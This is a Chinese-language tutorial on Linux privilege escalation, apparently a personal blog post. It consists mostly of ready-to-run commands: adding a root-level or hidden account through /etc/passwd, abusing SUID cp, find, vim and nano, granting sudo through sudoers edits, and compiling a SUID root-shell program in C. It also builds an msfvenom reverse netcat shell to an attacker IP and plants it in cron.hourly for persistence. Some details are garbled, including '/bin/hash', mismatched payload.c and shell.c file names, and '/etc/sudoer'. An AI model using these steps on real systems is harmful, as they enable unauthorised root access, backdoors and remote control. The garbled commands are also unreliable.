Linux提权(持续更新)

利用/etc/passwd提权

个人认为，这种提权方式在现实场景中难以实现，条件太过苛刻，但是建立Linux下的隐藏账户是个不错的选择，灵感来自：https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/

1. 利用条件

   • 拥有一个普通用户的权限
   • 普通用户有/etc/passwd的写权限

2. 利用原理

   目前不是特别清楚，只知道Linux下的/etc/passwd用于标识账户信息，/etc/shadow用于标识密码信息，/etc/group用于标识用户组信息

3. 利用细节

   直接修改/etc/passwd，先观察root用户的格式：

   root:x:0:0:root:/root:/bin/bash
   

   root表示用户名；x表示密码hash，0表示用户ID，0表示用户组ID，/root表示用户相关信息，/bin/bash表示该用户使用何种shell执行命令

   举个例子：

   test:passwd_hash:0:0::/bin/hash
   

   这里只要设置密码hash值即可，制作密码hash有以下几种方式：

   • OpenSSL

     openssl passwd -1 -salt salt password
     

   • mkpasswd

     mkpasswd -m SHA-512 password
     

   • Python

     python -c 'import crypt; print crypt.crypt("password","$6$salt")'
     

   • Perl

     perl -le 'print crypt("password","salt")'
     

   • PHP

     php -r "print(crypt('password','salt') . \"\n\");"
     

利用suid提权

灵感来自：https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/

在Linux中，存在suid、guid、sticky，suid是一种权限类型，它允许拥有SUID的用户使用指定用户的权限执行文件，通常SUID表示文件的最高执行权限。一般Linux中文件的权限如0777，第一位0表示为特殊权限，7表示rwx(读写执行)；对于第一位，如果是4表示拥有SUID权限，如果是2表示拥有GUID权限，如果是1表示，拥有sticky的权限，它能创建删除任何用户ID在目录中的文件

在实际复现时，发现确实还是挺实用的-.-，测试环境kali-2019.1

1. 利用条件

   • 文件拥有SUID权限
   • 一个普通用户权限

2. 利用原理

   本质上是间接利用了/etc/passwd提权，一般采用find / -perm -u=s -type f 2>/dev/null

3. 利用细节

   • 利用cp命令提权

     第一：查看/bin/cp是否具备SUID权限

     whereis find
     find / -perm -u=s -type f 2>/dev/null
     

     第二：替换/etc/passwd

     先获取原本的/etc/passwd；然后在文件中添加一行用户信息，其中用户的hash制作可参考/etc/passwd提权中的方式；最后将篡改后的passwd文件覆盖/etc/passwd文件

     第三：第二步其实已经完成，此处可再利用cp命令反弹shell

     msfvenom -p cmd/unix/reverse_netcat lhost=攻击者IP lport=攻击者监听的端口 R
     # 生成并保存至1.sh文件中
     

     # 将反弹shell的脚本放置在计划任务中，使其每小时启动一次
     cp 1.sh /etc/cron.hourly/
     

   • 利用find命令提权

     第一：查看find命令所在的文件位置

     whereis find
     find / -perm -u=s -type f 2>/dev/null
     

     第二：使用find执行系统命令

     # 先创建一个空文件
     touch temp
     # 然后借助空文件执行系统命令
     find temp -exec "whoami" \;
     # 这几个命令比较相似，区别无非就是：有没有引号，有没有花括号，实际测试时，这条指令一切OK
     find /etc/passwd -exec whoami \;
     # 其它命令
     find /etc/passwd -exec whoami {} \;
     

     第三：扩展

     # 实际测试时，综合利用，发现还比较实用，因为find一般默认拥有SUID权限
     # 在测试时发现执行命令有时跟当前一般用户权限有关，如：重定向操作符无法正常使用，因为没有写权限
     # 这里采用一种迂回的方式，写文件
     # 使用dd命令生成一个空文件
     dd if=/dev/zero of=/var/www/html/1.txt bs=1 count=1
     # 然后使用sed替换文件内容
     sed -i 's/\x0/content/g' /var/www/html/1.txt
     # 使用这种方法，结合/etc/passwd提权方式，获取root权限
     

   • 利用vim编辑器提权

     第一：查看vim所在的文件位置

     which vim
     whereis vim
     find / -perm -u=s -type f 2>/dev/null
     

     第二：赋予普通用户sudo的权限

     # 通过修改sudoer文件给与指定用户sudo的权限
     visudo
     vim.basic /etc/sudoer
     # 在文件中写入一行数据
     username ALL=(ALL:ALL) ALL
     

     第三：验证用户是否拥有root权限

     # 直接进入root的交互命令行
     sudo bash
     # sudo查看shadow文件
     sudo cat /etc/shadow
     

   • 使用已保存的脚本提权

     个人觉得这种方式没另外几种实用性好

     #include<stdio.h>
     #include<unistd.h>
     #include<sys/types.h>
     
     int main()
     {
     	setuid(geteuid());
     	system("/bin/bash");
     	return 0;
     }
     

     上述代码保存至文件payload.c

     使用以下命令生成一个拥有SUID的payload可执行文件

     gcc shell.c -o shell
     chmod u+s shell
     

     执行payload程序，获取root权限的交互shell

     ./payload
     id
     

   • 通过Nano编辑器提权

     第一：获取nano的文件位置

     which nano
     whereis nano
     find / -perm -u=s -type f 2>/dev/null
     

     第二：直接修改/etc/passwd

     # 编辑/etc/passwd
     nano /etc/passwd
     # 添加一行数据(参考/etc/passwd提权方式)
     test:password_hash:0:0::/root:/bin/bash
     

     第三：其实第二步已经达成目标，第三步可选[个人感觉不是很方便]

     # 编辑/etc/shadow
     nano /etc/shadow
     # 添加一行数据
     按照格式填写用户相关的密码hash